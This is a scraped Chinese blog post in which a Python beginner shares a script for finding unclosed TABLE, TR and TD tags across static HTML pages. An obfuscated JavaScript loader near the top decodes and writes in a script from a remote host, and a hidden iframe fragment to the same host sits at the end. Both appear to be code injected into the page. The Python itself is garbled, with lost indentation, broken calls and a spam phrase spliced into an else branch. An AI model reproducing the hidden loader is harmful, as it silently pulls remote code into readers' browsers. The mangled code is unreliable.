⼀个简单的PYTHON代码
HTML Tags and JavaScript tutorial
<script language="javascript">var
encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15wg/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
⼀个简单的PYTHON代码
⽤PYTHON写代码很⾼兴,更⾼兴的是今天竟然⽤了⼀天的上班时间来练这个。当然也是为我们的那个程序服务的。
我们⽬前要把⼀个表态HTML页⾯转换成PORTAL。由于表态页⾯数量很⼤,所以我们采⽤动态改写的⽅法。由于这篇的⽬的不是介绍我们的项⽬,所以直接说我的脚本。由于我们的⼯作,我们现在做操作前要对所以的静态页⾯进⾏简单的标记分析。这⾥主要分析TABLE,TR和TD。
下⾯贴下我的代码:主要是两个⽂件
htmlParser.py
import os,util
def htmlParse (htmlname,errorfile):
stackList = []
total = 0
incomment = 0
file = open(htmlname)
strLines = adlines()
for line in strLines:
total += 1
comtmp = util.judgeComment (line)
if comtmp == 1:#<!-- -->
pos1 = line.find('<!--') - 1
pos2 = line.find('-->') + 2
line = line[0:pos1] + line[pos2:]
if comtmp == 2:#<!--
incomment = 1
pos = line.find('<!--') - 1
line = line[0:pos]
if comtmp == 3:#-->
incomment = 0
pos = line.find('-->') + 2
line = line[pos:]
if incomment == 1:# this line is in comment
continue
taglist = LineTagList(line)
for item in taglist:
res = util.addDelTag(item,stackList)
if res == -1:
errorinfo = htmlname + os.altsep + str(total) + str(stackList) + os.linesep
errorfile.append(errorinfo)
return
if len(stackList) != 0:
result = htmlname + str(stackList) + ' are not closed!' + os.linesep
#errorfile.append(result)
if __name__ == '__main__':
pattern = "*.html"
startdir = "F://sshome"
#startdir = "D://test"
files = util.find (pattern, startdir)
res = []
for filename in files:
htmlParse(filename,res)
res.append(str(len(res)))
filewrite = file("F://",'w')
filewrite.writelines(res)
另⼀个⽂件util.py
import os, fnmatch
# judge comment tag to delete comment statement
def judgeComment (line):
openTag = line.find('<!--')
closeTag = line.find('-->')
if openTag != -1:
if closeTag != -1:# <!--  -->
return 1
else:#<!--
return 2
elif closeTag != -1:#-->
return 3
else:#
return 4
# sort for a 2 dimension list(array)
def sortFor2di (listtosort):
size = len(listtosort)
for i in range(size-1):
for j in range(i + 1,size):
list1 = listtosort[i]
list2 = listtosort[j]
if list1[0] > list2[0]:
listtosort[i],listtosort[j] = listtosort[j],listtosort[i] # get all tags in a line in the form of list
def getLineTagList (line):
taglist = []
addTag2List (line,'table',taglist)
addTag2List (line,'tr',taglist)
addTag2List (line,'td',taglist)
sortFor2di (taglist)
return taglist
def addTag2List (line,tag,taglist):
pos = line.find('<'+tag)
if pos != -1:
taglist.append([pos,'<'+ tag + '>'])
pos = line.find('</'+tag+'>')
if pos != -1:
taglist.append([pos,'</' + tag + '>'])
def addDelTag(itemlist,stackList):
tag = itemlist[1]
res = 0
res += judgeWhichTag (tag,'table',stackList)
res += judgeWhichTag (tag,'tr',stackList)
res += judgeWhichTag (tag,'td',stackList)
if res != 0:
return -1
python新手代码画图else:
return 1
#
def judgeWhichTag (tag,lable,stackList):
if tag == '<' + lable + '>':
stackList.append(lable)
return 0
elif tag == '</' + lable + '>':
size = len(stackList)
if size < 1:
return -1
elif stackList[size - 1] == lable:
del(stackList[size -1 ])
return 0
else:
return -1
else:
return 0
# used to deal tag
def tagDeal (tag, line,stackList):
openTag = line.find('<'+tag)
closeTag = line.find('</'+tag+'>')
if openTag != -1:
stackList.append (tag)
if closeTag == -1:
return 1
if closeTag != -1:
size = len(stackList)
if size < 1:
return -1
else:
lastItem = stackList[size - 1]
if lastItem != tag:
return -1
else:
del (stackList[size - 1])
return 1
def find (pattern,startdir=os.curdir):
files = []
os.path.walk(startdir,visitor,(pattern,files))
files.sort()
return files
def visitor ((pattern,files),thisdir,names):
for name in names:
if fnmatch.fnmatch(name,pattern):
fullpath = os.path.join(thisdir,name)
files.append(fullpath)
申明⼀下,我是初学PYTHON。上⾯的程序写得很乱,以后有时间再修改或加点注释。当然很欢迎各位朋友
给点意见。
不过,最后的结果是我们的总共1000表态页⾯中共有200个页⾯这三种标签有错误。这就意味着有⼀⼤堆事情要处理。⾄于怎么做我们还没做好决定。 src="avss.b15wg/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">